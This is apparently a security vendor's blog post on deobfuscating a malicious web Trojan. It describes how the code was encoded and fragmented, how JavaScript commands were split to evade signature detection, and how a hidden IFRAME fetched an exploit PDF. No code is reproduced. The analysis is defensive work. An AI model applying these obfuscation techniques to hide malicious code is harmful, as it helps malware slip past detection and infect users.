Thanks to the Websense® ThreatSeeker® Network, we discovered another interesting case involving a malicious Web Trojan and analyzed it. Let’s share our deobfuscation experience.
The first step was to identify the location of the malicious code, shown in the red pane of the following image. Then we deobfuscated the code.
Here are some interesting details that we uncovered about the code:
1. The original code was converted into decimal codes, which could be analyzed by a browser in HTML. Then these decimal codes were changed into hexadecimal codes.
2. The step length was configured as 10 characters, and a random special symbol was inserted into the hexadecimal code step by step.
3. The hexadecimal codes with special symbols were then split into 90 parts and every part was given a name ID, such as “d0, d1, d2 … d89,”, sometimes in order from 0 to 89, and other times, completely out of order.
4. The image below further reveals that the common JavaScript command for deobfuscating was split to avoid signature matching. The frequently used commands “getAttribute” and “parseInt” were also split in what appears as a big jumble.
5. The code displayed in the preceding image was used to make the obfuscated code into the original code, which can be analyzed by a browser. It could convert the 90 parts of obfuscated code into a whole program by ID, in order from 0 to 89.
6. The most useful original code is shown in the above image, hidden in the IFRAME tag content, it downloads a PDF file for exploiting. Before this malicious program can carry out its dirty deeds, perhaps it will perform other useless operations or insert some “identical equation” in the code that specifies that as statement is “TRUE,” “ if (12==022).”
We’re happy to share this deobfuscation experience with you.